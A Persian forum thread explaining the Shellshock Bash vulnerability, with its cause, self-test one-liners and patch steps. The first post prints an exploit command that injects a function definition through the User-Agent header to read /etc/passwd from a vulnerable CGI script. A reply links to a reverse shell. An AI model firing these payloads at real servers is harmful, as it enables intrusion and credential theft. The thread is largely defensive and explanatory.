SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

آنچه باید درباره آسیب پذیری "شل شاک" بدانید!

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • آنچه باید درباره آسیب پذیری "شل شاک" بدانید!

    سلامبه همه دوستان عزیز
    چند وقتیه که یک آسیب پذیری High از bash لینوکس پیدا شده و عملکردش شبیه به باگ خونریزی قلبی هست گفتم که اینجا یه مطلبی دربارش بزارم که شما بیشتر با این آسیب پذیری اشنا بشین!

    چه سرویس‌هایی می‌تواند آسیب‌پذیر باشد؟
    طبق بررسی اولیه، هر سیستم‌عامل مبتنی بر Unix دارای Bash به روز نشده، دستگاه‌های توکار دارای Bash مانند روتر‌ها، دوربین‌های آنلاین و … می‌توانند آسیب‌پذیر باشند. آیا میزان ریسک این آسیب‌پذیری از آسیب‌پذیری HeartBleed بیشتر است؟
    تا روشن شدن همه زوایای این آسیب پذیری باید منتظر ماند ولی جواب ما در حال حاضر به این سوال خیر است. اما nist.gov برای شدت آسیب‌پذیری ShellShock شدت ۱۰ از ۱۰ در نظر گرفته است. این آسیب‌پذیری برای بهره‌برداری نیاز به دسترسی اولیه ندارد و در شرایطی از راه دور با ارسال یک درخواست می‌توان دستوراتی را سیستم قربانی اجرا کرد. در آسیب‌پذیری HeartBleed نیز بدون نیاز به دسترسی اولیه امکان بهر‌ه‌برداری وجود داشت ولی امکان اجرای دستور بروی سیستم قربانی به صورت مستقیم وجود نداشت.
    با این حال بررسی های اولیه نشان می‌دهد که گستردگی این آسیب‌پذیری (ShellShock) برای بهره‌برداری از راه دور، حداقل در بین وب‌ سایت‌های ایرانی بسیار کمتر از HeartBleed می‌باشد. اما باید توجه داشت که به طور کلی گستردگی ShellShock بیشتر از HeartBleed می‌باشد زیرا بسیاری از نرم‌افزار‌ها از Bash استفاده می‌کنند که در نتیجه آن‌ها نیز آسیب‌پذیر هستند. به عبارت دیگر بر خلاف HeartBleed که نسخه‌های خاصی را مورد تهدید قرار داده بود این آسیب‌پذیری ممکن است در بسیاری از نرم‌افزارهای قدیمی که مثلاً در دوربین‌های آنلاین، روتر‌ها و … استفاده شده است نیز وجود داشته باشد. ریشه‌ی این آسیب‌پذیری چیست؟
    Bash به کاربر این قابلیت را می‌دهد که متغیر و یا توابعی (Environment Variable) را تعریف کند که در بین چند Instance از Bash به اشتراک گذاشته شود. ریشه‌ی این باگ در زمان تجزیه (Parse) تعریف تابع می‌باشد. هنگامی که یک تابع به صورت زیر تعریف شود:[php]VAR='() { :; }; /bin/pwd' bash -c ""[/php]مفسر Bash در تشخیص اتمام تعریف تابع دچار خطا می‌شود. در زمان اجرا شدن Bash این متغیر بارگزاری می‌شود و رشته‌ی بعد از کارکتر ; را اجرا می‌کند. در مثال بالا اجرای /bin/pwd مسیر جاری نمایش داده می‌شود.

    بهره‌برداری از این آسیب‌پذیری چگونه امکان‌پذیر است؟
    در اینجا منظور از بهره‌برداری، بهره برداری از راه دور می‌باشد؛ یعنی حالتی که نفوذگر دسترسی به سیستم قربانی نداشته باشد. در این حالت باید از طریقی نفوذگر بتواند یک Environment Variable (متغیر محیطی) دستکاری شده را در سیستم قربانی تنظیم کند. با این شرایط بیشترین احتمال برای بهره‌برداری از این آسیب‌پذیری از راه دور از طریق یک CGI Script آسیب‌پذیر خواهد بود. در این شرایط نفوذگر با ارسال یک درخواست دستکاری شده که حاوی دستوراتی خطرناک است می‌تواند کنترل کامل سیستم قربانی را در دست بگیرد. برای مثال بدون دسترسی به سیستم‌ قربانی، از راه دور با ارسال یک درخواست می‌توان هر دستوری را در سیستم قربانی اجرا کرد. مثلاً در یک CGI Script آسیب‌پذیر مانند مثال زیر:[php]#!/bin/bash
    echo "Content-type: text/html"

    echo ""
    echo '<html>'
    echo '<head>'
    echo '<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">'
    echo '<title>Test</title>'
    echo '</head>'
    echo '<body>'
    /usr/bin/env
    echo '</body>'
    echo '</html>'
    exit 0[/php]
    با ارسال یک درخواست که مقدار User-Agent در آن تغییر یافته است می‌توان محتوای فایل /etc/passwd را خواند.[php]curl -A "() { foo;};echo;/bin/cat /etc/passwd" http://example/vulnerable.cgi[/php]
    آیا من آسیب‌پذیر هستم؟
    اگر سیستم‌عامل شما از خانواده Linux و یا OS X است دستور زیر را در خط فرمان وارد کنید. اگر متن You are vulnerable!! را مشاهده کردید یعنی نسخه‌ی آسیب‌پذیر Bash بروی سیستم‌عامل شما نصب شده است.[php]VAR='() { :; }; echo "You are vulnerable!!"' bash -c ""[/php]
    همچنین اگر با اجرای دستور زیر یک فایل خالی به اسم echo در سیستم شما ایجاد شود یعنی وصله‌ی ناقص Bash را نصب کرده‌اید و باید دوباره بروز رسانی را انجام دهید.[php]env X='() { (a)=>\' sh -c "echo date";[/php]
    چگونه باید آسیب‌پذیری را رفع کنم؟
    برای رفع آسیب‌پذیری باید نرم‌افزار Bash را آپدیت کنید. با توجه به نرم‌افزار مدیریت بسته‌ها (Package Manager) نصب شده روی سیستم‌تان باید این کار را انجام دهید. مثلاً در Ubuntu:[php]apt-get update; apt-get upgrade;[/php]اگر آپدیت توسط نرم‌افزار مدیریت بسته‌ها شناسایی نشد از دستور زیر استفاده کنیدwget http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz[php]tar zxvf bash-4.3.tar.gz
    cd bash-4.3
    ./configure
    make
    make install[/php]در سیستم‌عامل OS X :[php]ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
    brew update
    brew install bash
    sudo sh -c 'echo "/usr/local/bin/bash" >> /etc/shells'
    chsh -s /usr/local/bin/bash[/php]
    [align=center]My Email: [email protected]
    [/align][align=left]mov problems,hell
    sub me,pain
    add me,love
    inc pleasure
    inc adrenaline
    push limits
    call hopeForAbetterTomorrow[/align]

  • #2
    RE: آنچه باید درباره آسیب پذیری "شل شاک" بدانید!

    با تشکر از توضیحات کامل شما

    برای تست یک سایت که دارای این آسیب پذیری هست یا نه می توانید از سایت زیر استفاده کنید

    http://webcare.ir:81/shell/

    موفق باشید
    [align=center]IranHack Security Team
    My Home
    YAhoo : Faridmahdavi00
    Net-Line.ir


    Coming Soon Android[/align]

    نظر


    • #3
      RE: آنچه باید درباره آسیب پذیری "شل شاک" بدانید!

      اینم reverse shell

      لینک : http://pastebin.com/166f8Rjx
      [align=center]IranHack Security Team
      My Home
      YAhoo : Faridmahdavi00
      Net-Line.ir


      Coming Soon Android[/align]

      نظر

      صبر کنید ..
      X